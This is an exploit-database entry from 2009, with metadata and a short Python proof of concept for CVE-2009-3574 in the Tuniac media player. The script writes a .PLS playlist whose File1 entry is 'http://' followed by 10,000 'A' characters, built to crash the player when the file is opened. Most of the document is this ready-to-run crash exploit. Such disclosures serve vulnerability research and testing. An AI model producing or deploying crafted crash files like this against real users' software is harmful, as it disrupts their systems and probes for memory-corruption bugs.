Tuniac 090517c - '.pls' Local Crash (PoC)

Author: zAx
type: dos
platform: windows
port: 
date_added: 2009-09-13  
date_updated:   
verified: 1  
codes: OSVDB-58882;CVE-2009-3574  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9671.py  
#!/usr/bin/env python
# Tuniac v.090517c (.PLS) Crash PoC
# By : zAx
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download

buffer = ("[playlist]\x0ANumberOfEntries=1\x0AFile1=http://" + "\x41" * (10000));

f = open('Crash_Poc.PLS','w');
f.write(buffer);
f.close();

# milw0rm.com [2009-09-14]